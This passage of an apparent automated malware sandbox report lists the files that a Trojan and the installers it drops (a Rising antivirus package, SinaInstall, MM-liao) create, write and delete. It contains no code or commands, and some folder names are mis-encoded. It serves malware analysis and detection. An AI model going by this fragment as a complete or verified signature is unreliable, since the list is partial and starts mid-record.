%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\datastorage.db (19 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\setup.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\c[1].aspx (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\update.xml (164 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\ShortCut\RAV.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RAV\mondef.dll (3361 bytes)
%Program Files%\Rising\RSD\RsAppMgr.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rscommx2.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bacore.dll (5060 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcr90.dll (7805 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.exe (817 bytes)
%Program Files%\Rising\RSD\update.xml (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\setup.dat (126 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\rsmon.db1 (43 bytes)
%Program Files%\Rising\RAV\cnt09.dll (1281 bytes)
%Program Files%\Rising\RSD\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RAV.ico (81 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard_if.dll (459 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\syslay.dll (26 bytes)
%Program Files%\Rising\RAV\localopt.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\MSCRT9.xml (961 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\language.ini (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon_if.dll (1803 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.ATL.manifest (466 bytes)
%Program Files%\Rising\RAV\cloudnotifier.dll (1425 bytes)
%Program Files%\Rising\RAV\traywnd.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk.dll (6045 bytes)
%Program Files%\Rising\RSD\localopt.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dat (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudstore.dll (2897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsndisp.sys (10 bytes)
%Program Files%\Rising\RAV\kguard_if.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\dataups.dat (207 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD950\CHT.lag (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Auto.ini (36 bytes)
%Program Files%\Rising\RSD\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcp90.dll (5724 bytes)
%Program Files%\Rising\RSD\CfgDll.dll (1425 bytes)
%Program Files%\Rising\RAV\rsxml3a.dll (673 bytes)
%System%\drivers\rsndisp.sys (10 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsutils.sys (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsMain.ico (27 bytes)
%Program Files%\Rising\RAV\rstasku.xml (4 bytes)
%Program Files%\Rising\RAV\XMLS\_RAV.xml (368 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\mondef.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dll (1069 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\RAV.ini (599 bytes)
%Program Files%\RsTest.ini (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\dfw.dll (3888 bytes)
%Program Files%\Rising\RAV\syslay.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase (4 bytes)
%Program Files%\Rising\RAV\RsBaseNetWrapper.dll (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\ravmond.exe (1990 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\ravcfg.xml (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Repair.url (155 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\ravcfg.xml (601 bytes)
%Program Files%\Rising\RSD\popwndexe.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RAV\rav936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.xml (4 bytes)
%System%\drivers\kguard.sys (601 bytes)
%Program Files%\Rising\RAV\mondrv.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\RstoreDll.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\rav936.xml (515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\adefmon.mond (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon.sys (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\RAVLOG.xml (545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\lics936.txt (8 bytes)
%Program Files%\Rising\RSD\XMLS\RSSetup.xml (6 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\CLOUDV3.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\atl90.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccom.dll (1039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Setup.exe (8063 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\ravbase.xml (4 bytes)
%Program Files%\Rising\RAV\cloudwork.dll (7726 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\traywnd.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsndisp.sys (11 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RavSetup.dll (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\rsmondef.xml (1 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\rsuser.db (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\ravmon.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsdll.dll.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Custom.xml (775 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RsBaseNetWrapper.dll (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\lics936.txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rscom.dll (1384 bytes)
%Program Files%\Rising\RAV\defmon.dll (3361 bytes)
%Program Files%\Rising\RAV\rsmain.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\localopt.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsStub.exe (64 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\RAVDEFDB.xml (967 bytes)
C:\rising.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Rising.ico (3 bytes)
%Program Files%\Rising\RAV\uprsmon.dat (45 bytes)
%Program Files%\Rising\RAV\cloudnet.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\license.xml (347 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt08.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsmon.dat (45 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.CRT.manifest (496 bytes)
%Program Files%\Rising\RAV\XMLS\CLOUDV3.xml (1 bytes)
%Program Files%\Rising\RSD\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RAV\ravxp.exe (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\HOOKBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\CLOUDQRY.xml (1 bytes)
%Program Files%\Rising\RSD\Data\RAV\RAV.ini (57324 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\update.xml (164 bytes)
%Program Files%\Rising\RSD\comx3.dll (673 bytes)
%Program Files%\Rising\RAV\XMLS\RAV936.xml (515 bytes)
%Program Files%\Rising\RAV\cfgxml\userdata.mond (485 bytes)
%Program Files%\Rising\RAV\pngdll.dll (1425 bytes)
%Program Files%\Rising\RAV\Proccomm.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsdll.dll.dat (101 bytes)
%Program Files%\Rising\RAV\comx3.dll (673 bytes)
%Program Files%\Rising\RAV\hookbase.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsTray.ico (68 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\12345678.000 (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsTray.ico (601 bytes)
%Program Files%\Rising\RAV\XMLS\RAVBASE.xml (4 bytes)
%Program Files%\Rising\RAV\rstask.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsBackup.exe (1851 bytes)
%Program Files%\Rising\RAV\cloudstore.dll (2321 bytes)
%Program Files%\Rising\RAV\atl90.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\RAV936.xml (515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3 (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\RSMONDEF.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsAppMgr.dll (168 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Repair.url (155 bytes)
%Program Files%\Rising\RAV\XMLS\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\updater.exe (3361 bytes)
%Program Files%\Rising\RAV\rsdll.dll (601 bytes)
%Program Files%\Rising\RAV\Microsoft.VC90.ATL.manifest (466 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\datastorage.db (19 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsuser.db1 (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\adefmon.mond (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\install1403380.exe.log (314853 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (22865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\mondef.dll (2065 bytes)
%Program Files%\Rising\RAV\XMLS\RAVXP.xml (404 bytes)
%Program Files%\Rising\RAV\XMLS\RSCFG.xml (996 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\RAVXP.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rssrv.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll (6605 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\localopt.dll (1281 bytes)
%Program Files%\Rising\RAV\rscombas.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\monrule.dll (601 bytes)
%Program Files%\Rising\RAV\bawhite.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt08.dll (1787 bytes)
%Program Files%\Rising\RSD\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\ravdefdb.xml (967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccomm.dll (608 bytes)
%Program Files%\Rising\RAV\bawhite.dat (22 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mond (207 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\ravmond.exe (1425 bytes)
%Program Files%\Rising\RAV\NetConfig.ini (24 bytes)
%Program Files%\Rising\RSD\rsdk.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\RsBaseNetWrapper.dll (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdinfo.dll (1000 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\setup.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudsta.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt09.dll (2293 bytes)
%System%\drivers\sysmon.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.dll (1202 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\rslog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\traywnd.dll (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\pngdll.dll (741 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rscombas.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcp90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcr90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudstore.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Custom.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\moncomm.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\label.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\atl90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.ATL.manifest (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\popwndexe.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CfgDll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.CRT.manifest (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsutils.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\c[1].aspx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\ravmond.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\os.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsPcVer12.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\sysmon.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV_DL (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils_if.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rscurl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\ForLogDeve[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudnet.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\monbasedui.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\RsPcVer12[1].xml (0 bytes)
%Program Files%\RsTest.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\protreg.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.mond (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\localopt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\CAIZYB2P.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\license.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudnotifier.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000 (0 bytes)
%Program Files%\Rising\RAV (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\dataups.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard_if.dll (0 bytes)
%Program Files%\Rising (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CompsVer.inf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudwork.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\datastorage.db (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\urg[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudv3.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsdll.dll.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon_if.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudsta.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\urg[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rssrv.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsndisp.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\mscrt9.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\irg[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsndisp.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000.bak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\Cloudv3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\comx3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rsnscfg.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.rstray (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Auto.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\localopt.dll (0 bytes)
The process %original file name%.exe:1312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp\xID.dll (3 bytes)
C:\setup_a1474.exe (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp\3.dll (18791 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\desktop.ini (67 bytes)
C:\SinaInstall_567015.exe (15021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FFS5V15X\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1IRKDYZ\desktop.ini (67 bytes)
C:\MM-liao8327.exe (6359 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1.tmp (0 bytes)
The process RsMgrSvc.exe:468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Rising\RSD\RsMgrSvc.exe.log (367 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.dat (708 bytes)
The process ravmond.exe:1328 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Rising\RAV\logfiles\ravmond.exe.cloudwork.log (6073 bytes)
%Program Files%\Rising\RAV\logfiles\ravmond.exe.log (149 bytes)
%Program Files%\Rising\RAV\browserruncount.dat (944 bytes)
%Program Files%\Rising\RAV\prvcloudcfg.ini (26 bytes)
%Program Files%\Rising\RAV\ravmond.exe_status.ini (80 bytes)
%Program Files%\Rising\RAV\CCenter.db-journal (18630 bytes)
%Program Files%\Rising\RAV\CCenter.db (623 bytes)
The Trojan deletes the following file(s):
%Program Files%\Rising\RAV\CCenter.db-journal (0 bytes)
The process SinaInstall_567015.exe:604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\SinaInstall_567015.exe (15506 bytes)
The process SinaInstall_567015.exe:1296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\-¼ -\ui\InStaller\bg_01.png (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WSS96LYK\core[1].php (764 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\bg_02.png (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\installedSoftInfo.ini (1804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\jindutiao.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\skinconfig.ini (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\btn_03.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DI_17.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\prompt\pop_bg.png (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\delete.png (3 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@config.0551fs[1].txt (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\check1.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\-¼ -\ui\InStaller\bg_03.png (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\bg_03.png (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\InStaller_prompt.ini (375 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\bg_01.png (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\input_01.png (3 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_9.tmp (633 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\change.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CA_8.tmp (2705 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\prompt\cancel_btn.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\LZMA.dll (68 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1IRKDYZ\z_stat[1].php (1097 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_7.tmp (201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\InStaller.ini (939 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\unrar.dll (824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\-¼ -\ui\InStaller\bg_02.png (258 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\install_begin[1].htm (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\btn_change02.png (3 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\finish.png (392 bytes)
